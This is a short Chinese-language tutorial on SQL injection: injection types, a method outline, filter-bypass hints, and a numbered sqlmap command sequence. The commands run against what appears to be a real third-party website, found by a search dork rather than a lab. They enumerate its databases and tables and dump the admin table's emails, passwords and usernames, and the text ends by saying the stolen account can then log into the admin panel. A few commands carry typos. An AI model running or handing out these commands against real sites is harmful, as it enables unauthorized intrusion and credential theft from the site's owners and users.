注入类型:字符型、数字型、搜索型
注入思路:1.检测是否存在注入 2.检测注入类型 3.构造注入语句 4.根据语句设置闭合点
如果存在过滤机制:根据判断出的数据库类型查询对应运行方式(eg:+ 、||),设计语句表现形式使语句绕过过滤机制在数据库中执行时仍然是一条完整的注入语句(eg:空格,ascII码等),即可达到注入目的
sqlmap实战 :想用dvwa但是一直有问题,所以直接实站测试,可供测试站点较多 请合法测试
命令:
0.inurl:.course.php?id=xxx 寻找可能的注入点的站点
1.sqlmap.py -u http://www.icd.org.pk/course.php?id=16 检测是否存在注入点
2.sqlmap.py -u http://www.icd.org.pk/course.php?id=16 --dbs 显示数据库
3.sqlmap.py -u http://www.icd.org.pk/course.php?id=16 --current-db 显示当前数据库
4.sqlmap.py -u http://www.icd.org.pk/course.php?id=16 --current-user 显示当前用户
-D 数据库 -T 表 按照数据库结构逐级查询
5.sqlmap.py -u http://www.icd.org.pk/course.php?id=16 -D 当前数据库名 --tables 查询有哪些表
6.sqlmap.py -u http://www.icd.org.pk/course.php?id=16 -D 当前数据库名-T 要查询的表--columns 查询表有哪些字段
7.sqlmap.py -u http://www.icd.org.pk/course.phpid=16 -D efnypvon_icd_db -T icd_tbl_admin "
fEmail,fPassword,fUserName" --dump dump出fEmail,fPassword,fUserName字段中的数据
以上完成sql注入查询,之后可以使用账号进入管理界面
sqlmapGUI
